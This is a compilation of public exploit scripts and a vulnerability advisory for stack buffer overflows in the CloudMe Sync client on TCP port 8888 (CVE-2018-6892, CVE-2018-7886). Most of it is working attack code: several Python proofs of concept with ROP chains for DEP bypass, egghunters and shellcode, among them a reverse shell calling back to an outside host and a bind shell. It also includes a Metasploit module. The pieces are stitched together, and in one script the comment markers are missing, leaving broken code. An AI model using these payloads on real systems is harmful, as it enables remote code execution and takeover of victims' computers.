# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact:https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218
import socket
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61bdd7f5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68aef542, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x68bfe66b, # POP EBP # RETN [Qt5Core.dll]
0x68f82223, # & jmp esp [Qt5Core.dll]
0x6d9f7736, # POP EDX # RETN [Qt5Sql.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e870e0, # POP EBX # RETN [Qt5Gui.dll]
0xffffffff, #
0x6204f463, # INC EBX # RETN [Qt5Gui.dll]
0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
0x61ec44ae, # POP EDX # RETN [Qt5Gui.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x61e2a807, # POP ECX # RETN [Qt5Gui.dll]
0x6eb573c9, # &Writable location [libgcc_s_dw2-1.dll]
0x61e85d66, # POP EDI # RETN [Qt5Gui.dll]
0x6d9e431c, # RETN (ROP NOP) [Qt5Sql.dll]
0x61ba8ce5, # POP EAX # RETN [Qt5Gui.dll]
0x90909090, # nop
0x61b6b8d0, # PUSHAD # RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
target="127.0.0.1"
junk="A"*1052
eip = "\xfc\x57\xea\x61" # 0x61ea57fc
nops = "\x90\x90\x90\x90"
egg64 = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x77\x30\x30\x74" # tag w00t
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
#Shellcode calc.exe
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
payload = junk+ eip + nops * 3 + rop_chain + nops*4 + egg64 + nops*4 + "w00tw00t" + shellcode
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except:
print "Crashed!"
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !
#############################################################
import socket
egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
target="127.0.0.1"
junk="A"*1015
jmp="\xd9\x37\x99\x69" #0x699937d9 push ret
jump_back="\xeb\xc4" #jump -60 bytes
#Shellcode calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
payload1=junk+egg+"B"*5 + jmp + jump_back
payload2="boomboom" + buf
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload1+payload2)
except:
print "Don't Crash Me !"
#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################
#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018
# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
target="127.0.0.1"
junk="A"*1052
eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
shellcode=("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
payload=junk+eip+shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'CloudMe Sync v1.10.9',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in CloudMe Sync v1.10.9 client application. This module has been
tested successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'hyp3rlinx', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'References' =>
[
[ 'CVE', '2018-6892'],
[ 'EDB', '44027' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00",
},
'Targets' =>
[
[ 'CloudMe Sync v1.10.9',
{
'Offset' => 2232,
'Ret' => 0x61e7b7f6
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 17 2018',
'DefaultTarget' => 0))
register_options([Opt::RPORT(8888)])
end
def exploit
connect
buffer = make_nops(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
sock.put(buffer)
handler
end
end
# Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)
# Date: 2018-08-05
# Exploit Author: Manoj Ahuje
# Linkedin: https://www.linkedin.com/in/manojahuje/
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested on: Windows 10 Home (x64)
#!/usr/bin/env python
import socket,struct
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass on Win10 x64'
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
0x690398a0, # ptr to &VirtualAlloc() [IAT Qt5Core.dll]
0x61cd7f74, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x699f619a, # POP EBP # RETN [Qt5Network.dll]
0x68f7a81b, # & jmp esp [Qt5Core.dll]
0x68f9a472, # POP EDX # RETN [Qt5Core.dll]
0xffffffff, # Value to negate, will become 0x00000001
0x6eb47052, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
0x68c7af10, # POP EBX # RETN [Qt5Core.dll]
0xffffffff, #
0x6201df92, # INC EBX # RETN [Qt5Gui.dll]
0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
0x61f03b9c, # POP EAX # RETN [Qt5Gui.dll]
0x7cfc896b, # put delta into eax (-> put 0x00001000 into edx)
0x69a76004, # ADD EAX,83038642 # ADD AL,53 # RETN [Qt5Network.dll]
0x62035b71, # XCHG EAX,EDX # RETN [Qt5Gui.dll]
0x61db4eca, # POP EAX # RETN [Qt5Gui.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x6fe4ceaa, # NEG EAX # RETN [libstdc++-6.dll]
0x68fb862d, # XCHG EAX,ECX # RETN [Qt5Core.dll]
0x68b13f2a, # POP EDI # RETN [Qt5Core.dll]
0x6fe4ceac, # RETN (ROP NOP) [libstdc++-6.dll]
0x61ba8fa8, # POP EAX # RETN [Qt5Gui.dll]
0x90909090, # nop
0x61bf7fca, # PUSHAD # RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msf payload calc alpha numeric
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
host='127.0.0.1'
#payload = "A" * (2236+116)
junk1 = "A"*(156+48)
rop=rop_chain
nop = "\x90"*10
junk2="D"*(2236+116-len(junk1)-len(rop)-len(nop)-len(shellcode))
nseh = "GGGG"
seh = struct.pack('<L',0x699CCB7F)#network Address=699CCB7F Disassembly=ADD ESP,83C
trigger = "B"*50000
payload = junk1+rop+nop+shellcode+junk2 +nseh + seh + trigger
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,8888))
s.send(payload)
print 'Check calculator should be running'
# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested Against Version: 1.10.9
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)
# for his work on the original exploit
# Bad Characers: \x00
# SEH Offset: 2236
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll
# Victim Machine:
# C:\>netstat -nao | find "8888"
# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640
# C:\>tasklist | find "2640"
# CloudMe.exe 2640 Console 1 36,632 K
# Attacking Machine:
# root@kali:~/Desktop# python cloudme.py
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass
# [+] CloudMe Target IP> 192.168.12.4
# Sending buffer overflow to CloudMe Service
# Target Should be Running a Bind Shell on Port 4444!
# root@kali:~/Desktop# nc -nv 192.168.12.4 4444
# (UNKNOWN) [192.168.12.4] 4444 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe>
# My register setup when VirtualProtect() is called (Defeat DEP) :
--
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)
#!/usr/bin/python
import socket,struct
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'
def create_rop_chain():
rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x61d1e7fe, POP ECX RETN [Qt5Gui.dll]
0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll]
0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll]
0x68c8ea5a, POP EBP RETN [Qt5Core.dll]
0x68d652e1, & call esp [Qt5Core.dll]
0x68fa7ca2, POP EDX RETN [Qt5Core.dll]
0xfffffdff, Value to negate, will become 0x00000201
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x68d52747, POP EBX RETN [Qt5Core.dll]
0xffffffff,
0x68f948bc, INC EBX RETN [Qt5Core.dll]
0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll]
0x68f9a472, POP EDX RETN [Qt5Core.dll]
0xffffffc0, Value to negate, will become 0x00000040
0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll]
0x61f057ab, POP ECX RETN [Qt5Gui.dll]
0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll]
0x61dc14d1, POP EDI RETN [Qt5Gui.dll]
0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll]
0x61ba6245, POP EAX RETN [Qt5Gui.dll]
0x90909090, nop
0x61b45ea3, PUSHAD RETN [Qt5Gui.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name Current Setting Required Description
# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444 yes The listen port
# RHOST no The target address
#msf payload(shell_bind_tcp) > generate -b '\x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
shellcode = ""
shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4"
shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7"
shellcode += "\xb0\x5d\xf0\x2d"
ip=raw_input('[+] CloudMe Target IP> ')
stack_pivot=struct.pack('<L',0x61d95f58) {pivot 3492 / 0xda4} (Lands us into rop nop chain --> rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
rop_nop1=struct.pack('<L',0x68b1a714) * 300 RETN 0x10 ** [Qt5Core.dll] ** | {PAGE_EXECUTE_READ}
rop_nop2=struct.pack('<L',0x61c6fc53) * 50 RETN ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ}
nop = "\x90" * 20
payload = "A" * 2236 + stack_pivot + rop_nop1 + rop_nop2 + rop_chain + nop + shellcode + "B"*(5600-len(rop_nop1)-len(rop_nop2)-len(rop_chain)-len(nop)-len(shellcode))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow to CloudMe Service'
print 'Target Should be Running a Bind Shell on Port 4444!'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669
Vendor:
=============
www.cloudme.com
Product:
===========
CloudMe Sync <= v1.10.9
(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0
CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
CVE-2018-6892
Security Issue:
================
Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888, can send a malicious payload causing
a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC.
CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)
In Qt5Core:
00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst
C:\>netstat -ano | findstr 8888
TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504
TCP [::]:8888 [::]:0 LISTENING 15504
Buffer Overflow:
================
EIP register will be overwritten at about 1075 bytes.
EAX 00000001
ECX 76F698DA msvcrt.76F698DA
EDX 00350000
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141
Stack Dump:
==========
(508.524): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
41414141 ?? ???
Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems.
We will therefore use Structured Exceptional Handler overwrite for our exploit.
e.g.
6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)
0day Exploit POC:
==============
import socket,struct
print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
